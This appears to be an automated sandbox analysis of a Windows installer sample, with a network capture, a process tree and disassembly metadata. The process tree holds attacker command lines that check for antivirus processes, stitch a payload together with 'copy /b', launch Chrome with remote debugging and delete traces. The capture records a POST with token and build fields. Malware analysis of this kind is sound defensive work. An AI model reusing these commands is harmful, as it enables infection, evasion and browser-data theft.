2025-01-03 13:31:10 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 79 6d 37 79 75 73 30 7a 35 66 63 6a 6d 79 35 38 39 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 38 79 6d 37 79 75 73 30 7a 35 66 63 6a 6d 79 35 38 39 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 38 79 6d 37 79 75 73 30 7a 35 66 63 6a 6d 79 35 38 39 68 64 0d 0a 43 6f 6e 74 Data Ascii: ------8ym7yus0z5fcjmy589hdContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------8ym7yus0z5fcjmy589hdContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------8ym7yus0z5fcjmy589hdCont
2025-01-03 13:31:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:31:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:31:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	08:29:51
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\RisingStrip.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RisingStrip.exe"
Imagebase:	0x400000
File size:	1'143'251 bytes
MD5 hash:	754ABB74CA81D5AC0338DC27C0419467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:29:53
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Vids Vids.cmd & Vids.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:29:53
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:29:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x280000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:29:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x110000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:29:55
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x280000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:29:55
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x110000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:29:55
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 91531
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:29:55
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Shepherd
Imagebase:	0xa60000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:29:56
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "copyrighted" Tell
Imagebase:	0x110000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:29:56
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 91531\Red.com + Certificates + Mountain + Hydraulic + Advances + Am + Belongs + Housing + Viral + Bound 91531\Red.com
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:29:56
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Generated + ..\Er + ..\Soma + ..\Sponsors + ..\Identifies + ..\Phentermine + ..\Applying + ..\October q
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:29:56
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
Wow64 process (32bit):	true
Commandline:	Red.com q
Imagebase:	0x520000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:29:56
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x8f0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:30:37
Start date:	03/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:30:39
Start date:	03/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2184,i,6651775337915312218,4819002569926656069,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:31:10
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com" & rd /s /q "C:\ProgramData\y5xtj" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:31:10
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:31:10
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xcb0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
@rD, xrefs: 004053D7
New install of "%s" to "%s", xrefs: 00405182

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

NSIS Error, xrefs: 004038E2
/D=, xrefs: 004039A6
NCRC, xrefs: 0040397C
Error launching installer, xrefs: 00403A7D
SeShutdownPrivilege, xrefs: 00403C16
_?=, xrefs: 00403A64
\Temp, xrefs: 00403A1B
1C, xrefs: 00403B56
~nsu.tmp, xrefs: 00403AF7

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

@%F, xrefs: 0040682C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 00406A53
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
